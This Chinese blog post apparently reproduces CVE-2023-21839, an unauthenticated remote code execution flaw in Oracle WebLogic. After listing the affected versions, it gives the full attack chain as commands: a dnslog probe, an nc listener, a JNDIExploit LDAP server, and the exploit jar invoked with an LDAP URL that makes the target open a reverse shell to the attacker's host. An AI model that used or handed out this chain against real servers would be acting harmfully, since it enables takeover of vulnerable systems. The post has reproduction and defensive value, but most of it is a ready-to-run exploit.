当前位置: 首页 > news >正文

CVE-2023-21839 weblogic rce漏洞复现

文章目录

  • 一、漏洞影响版本
  • 二、漏洞验证
  • 三、启动反弹shell监听
    • 切换路径到jdk1.8
  • 四、启动ldap服务
  • 五、使用CVE-2023-21839工具来进行攻击测试
  • 六、反弹shell

一、漏洞影响版本

CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

二、漏洞验证

http://192.168.232.131:7001/console/login/LoginForm.jsp
在这里插入图片描述

java -jar Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://m08q4j.dnslog.cn/test
执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞
在这里插入图片描述

三、启动反弹shell监听

nc -lvp 2000
在这里插入图片描述

切换路径到jdk1.8

复现之前请务必切换路径到jdk路径下

四、启动ldap服务

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\JNDIExploit.v1.2\JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.180.2
在这里插入图片描述

五、使用CVE-2023-21839工具来进行攻击测试

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000
在这里插入图片描述

六、反弹shell

在这里插入图片描述

http://www.lryc.cn/news/218731.html

相关文章:

  • MQTT java代码演示
  • Windows环境下使用VLC获取到大疆无人机的RTMP直播推流
  • 【SpringBoot笔记42】SpringBoot集成knife4j生成接口文档
  • Go类型嵌入介绍和使用类型嵌入模拟实现“继承”
  • 【深度学习】pytorch——实现CIFAR-10数据集的分类
  • Datawhale-AIGC实践
  • C++对象模型
  • Linux Framebuffer驱动框架、接口实现和使用
  • AI:54-基于深度学习的树木种类识别
  • MVCC详解
  • [pytorch]手动构建一个神经网络并且训练
  • 马斯克的X.AI平台即将发布的大模型Grōk AI有哪些能力?新消息泄露该模型支持2.5万个字符上下文!
  • spring-session-core排除某些接口不设置session
  • 【ElasticSearch系列-05】SpringBoot整合elasticSearch
  • C/S架构学习之广播
  • 帧间快速算法论文阅读
  • mooc单元测验第一单元
  • AOC显示器出问题了?别担心,简单重置一下就OK了
  • ok-解决qt5发布版本,直接运行exe缺少各种库的问题
  • 【JavaEE】cookie和session
  • 关于CSS的几种字体悬浮的设置方法
  • 心脏骤停急救赋能
  • Android 13.0 根据app包名授予app监听系统通知权限
  • 校园招聘系统
  • SpringBoot-SpringCache缓存
  • 服务器带宽忽然暴增,不停的触发告警
  • Linux学习笔记之二(环境变量)
  • 设计模式——备忘录模式(Memento Pattern)
  • C++ 代码实例:多项式除法简单计算工具
  • MySql表自修改报错:You can‘t specify target table ‘student‘ for update in FROM clause